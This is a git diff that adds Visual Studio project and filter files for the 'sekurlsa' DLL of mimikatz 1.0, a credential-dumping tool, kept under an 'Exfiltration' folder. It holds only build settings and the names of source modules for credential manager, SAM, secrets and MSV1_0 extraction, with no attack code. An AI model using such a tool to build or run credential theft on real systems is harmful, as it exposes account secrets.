+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{3A436EFD-4FD7-4E5F-B0EC-F9DCCACF1E60}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>sekurlsa</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+    <UseOfMfc>Static</UseOfMfc>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+    <UseOfMfc>Static</UseOfMfc>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(SolutionDir)$(Platform)\</OutDir>
+    <IntDir>$(Platform)\</IntDir>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(SolutionDir)$(Platform)\</OutDir>
+    <IntDir>$(Platform)\</IntDir>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>NotUsing</PrecompiledHeader>
+      <Optimization>Full</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;PSAPI_VERSION=1;_WINDOWS;_USRDLL;SEKURLSA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <StringPooling>true</StringPooling>
+      <ExceptionHandling>false</ExceptionHandling>
+      <FloatingPointModel>Fast</FloatingPointModel>
+      <FloatingPointExceptions>false</FloatingPointExceptions>
+      <CreateHotpatchableImage>false</CreateHotpatchableImage>
+      <ErrorReporting>None</ErrorReporting>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <AdditionalDependencies>psapi.lib;secur32.lib;advapi32.lib;shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <LinkErrorReporting>NoErrorReport</LinkErrorReporting>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+    </Link>
+    <ResourceCompile>
+      <Culture>0x040c</Culture>
+    </ResourceCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>NotUsing</PrecompiledHeader>
+      <Optimization>Full</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;PSAPI_VERSION=1;_WINDOWS;_USRDLL;SEKURLSA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <StringPooling>true</StringPooling>
+      <ExceptionHandling>false</ExceptionHandling>
+      <FloatingPointModel>Fast</FloatingPointModel>
+      <FloatingPointExceptions>false</FloatingPointExceptions>
+      <CreateHotpatchableImage>false</CreateHotpatchableImage>
+      <ErrorReporting>None</ErrorReporting>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <AdditionalDependencies>psapi.lib;secur32.lib;advapi32.lib;shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <LinkErrorReporting>NoErrorReport</LinkErrorReporting>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+    </Link>
+    <ResourceCompile>
+      <Culture>0x040c</Culture>
+    </ResourceCompile>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="..\..\commun\kmodel.cpp" />
+    <ClCompile Include="..\..\modules\mod_memory.cpp" />
+    <ClCompile Include="..\..\modules\mod_parseur.cpp" />
+    <ClCompile Include="..\..\modules\mod_pipe.cpp" />
+    <ClCompile Include="..\..\modules\mod_process.cpp" />
+    <ClCompile Include="..\..\modules\mod_system.cpp" />
+    <ClCompile Include="..\..\modules\mod_text.cpp" />
+    <ClCompile Include="modules\credman.cpp" />
+    <ClCompile Include="modules\incognito.cpp" />
+    <ClCompile Include="modules\sam.cpp" />
+    <ClCompile Include="modules\secrets.cpp" />
+    <ClCompile Include="Security Packages\msv1_0.cpp" />
+    <ClCompile Include="Security Packages\msv1_0_helper.cpp" />
+    <ClCompile Include="sekurlsa.cpp" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="..\..\commun\kmodel.h" />
+    <ClInclude Include="..\..\commun\secpkg.h" />
+    <ClInclude Include="..\..\modules\mod_memory.h" />
+    <ClInclude Include="..\..\modules\mod_parseur.h" />
+    <ClInclude Include="..\..\modules\mod_pipe.h" />
+    <ClInclude Include="..\..\modules\mod_process.h" />
+    <ClInclude Include="..\..\modules\mod_system.h" />
+    <ClInclude Include="..\..\modules\mod_text.h" />
+    <ClInclude Include="modules\credman.h" />
+    <ClInclude Include="modules\incognito.h" />
+    <ClInclude Include="modules\sam.h" />
+    <ClInclude Include="modules\secrets.h" />
+    <ClInclude Include="Security Packages\msv1_0.h" />
+    <ClInclude Include="Security Packages\msv1_0_helper.h" />
+    <ClInclude Include="sekurlsa.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ResourceCompile Include="sekurlsa.rc" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters
new file mode 100644
index 0000000..936fcde
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters
@@ -0,0 +1,122 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Modules Communs">
+      <UniqueIdentifier>{87c9f520-31d1-4b44-a523-415e0c703bde}</UniqueIdentifier>
+    </Filter>
+    <Filter Include="Modules Communs\Communication">
+      <UniqueIdentifier>{8c6588bf-b3cf-4080-b59e-3ce82a6ccd62}</UniqueIdentifier>
+    </Filter>
+    <Filter Include="Modules Communs\Parseur">
+      <UniqueIdentifier>{9e44771d-18f4-407a-8f89-508cf5c366ff}</UniqueIdentifier>
+    </Filter>
+    <Filter Include="Modules Communs\Librairie Modèle">
+      <UniqueIdentifier>{541a9eff-641d-4a77-9b1f-e72ad6a7c0fa}</UniqueIdentifier>
+    </Filter>
+    <Filter Include="Modules Communs\Mémoire">
+      <UniqueIdentifier>{ba6b07a5-6d5b-4632-ad6e-56690630eaa7}</UniqueIdentifier>
+    </Filter>
+    <Filter Include="Security Packages">
+      <UniqueIdentifier>{1e52fbf9-a352-419f-870b-3c4e265781d8}</UniqueIdentifier>
+      <Extensions>
+      </Extensions>
+    </Filter>
+    <Filter Include="Modules Communs\System">
+      <UniqueIdentifier>{7fcd7c52-b4e5-4c6c-9dc7-190fbe667193}</UniqueIdentifier>
+    </Filter>
+    <Filter Include="Modules Communs\Texte">
+      <UniqueIdentifier>{c175e3ec-41d0-4474-bbc7-eb1962a7fc70}</UniqueIdentifier>
+    </Filter>
+    <Filter Include="Modules locaux pour sekurlsa">
+      <UniqueIdentifier>{b3819528-2e60-46a3-b37a-7c575a4d866a}</UniqueIdentifier>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="..\..\modules\mod_pipe.cpp">
+      <Filter>Modules Communs\Communication</Filter>
+    </ClCompile>
+    <ClCompile Include="..\..\modules\mod_parseur.cpp">
+      <Filter>Modules Communs\Parseur</Filter>
+    </ClCompile>
+    <ClCompile Include="..\..\commun\kmodel.cpp">
+      <Filter>Modules Communs\Librairie Modèle</Filter>
+    </ClCompile>
+    <ClCompile Include="..\..\modules\mod_memory.cpp">
+      <Filter>Modules Communs\Mémoire</Filter>
+    </ClCompile>
+    <ClCompile Include="sekurlsa.cpp" />
+    <ClCompile Include="..\..\modules\mod_system.cpp">
+      <Filter>Modules Communs\System</Filter>
+    </ClCompile>
+    <ClCompile Include="Security Packages\msv1_0.cpp">
+      <Filter>Security Packages</Filter>
+    </ClCompile>
+    <ClCompile Include="Security Packages\msv1_0_helper.cpp">
+      <Filter>Security Packages</Filter>
+    </ClCompile>
+    <ClCompile Include="..\..\modules\mod_text.cpp">
+      <Filter>Modules Communs\Texte</Filter>
+    </ClCompile>
+    <ClCompile Include="..\..\modules\mod_process.cpp">
+      <Filter>Modules Communs\System</Filter>
+    </ClCompile>
+    <ClCompile Include="modules\incognito.cpp">
+      <Filter>Modules locaux pour sekurlsa</Filter>
+    </ClCompile>
+    <ClCompile Include="modules\secrets.cpp">
+      <Filter>Modules locaux pour sekurlsa</Filter>
+    </ClCompile>
+    <ClCompile Include="modules\credman.cpp">
+      <Filter>Modules locaux pour sekurlsa</Filter>
+    </ClCompile>
+    <ClCompile Include="modules\sam.cpp">
+      <Filter>Modules locaux pour sekurlsa</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="..\..\modules\mod_pipe.h">
+      <Filter>Modules Communs\Communication</Filter>
+    </ClInclude>
+    <ClInclude Include="..\..\modules\mod_parseur.h">
+      <Filter>Modules Communs\Parseur</Filter>
+    </ClInclude>
+    <ClInclude Include="..\..\commun\kmodel.h">
+      <Filter>Modules Communs\Librairie Modèle</Filter>
+    </ClInclude>
+    <ClInclude Include="..\..\modules\mod_memory.h">
+      <Filter>Modules Communs\Mémoire</Filter>
+    </ClInclude>
+    <ClInclude Include="sekurlsa.h" />
+    <ClInclude Include="..\..\modules\mod_system.h">
+      <Filter>Modules Communs\System</Filter>
+    </ClInclude>
+    <ClInclude Include="Security Packages\msv1_0.h">
+      <Filter>Security Packages</Filter>
+    </ClInclude>
+    <ClInclude Include="Security Packages\msv1_0_helper.h">
+      <Filter>Security Packages</Filter>
+    </ClInclude>
+    <ClInclude Include="..\..\modules\mod_text.h">
+      <Filter>Modules Communs\Texte</Filter>
+    </ClInclude>
+    <ClInclude Include="..\..\commun\secpkg.h" />
+    <ClInclude Include="..\..\modules\mod_process.h">
+      <Filter>Modules Communs\System</Filter>
+    </ClInclude>
+    <ClInclude Include="modules\incognito.h">
+      <Filter>Modules locaux pour sekurlsa</Filter>
+    </ClInclude>
+    <ClInclude Include="modules\credman.h">
+      <Filter>Modules locaux pour sekurlsa</Filter>
+    </ClInclude>
+    <ClInclude Include="modules\secrets.h">
+      <Filter>Modules locaux pour sekurlsa</Filter>
+    </ClInclude>
+    <ClInclude Include="modules\sam.h">
+      <Filter>Modules locaux pour sekurlsa</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ResourceCompile Include="sekurlsa.rc" />
+  </ItemGroup>
+</Project>
\ No newline at end of file
-- 
cgit v1.2.3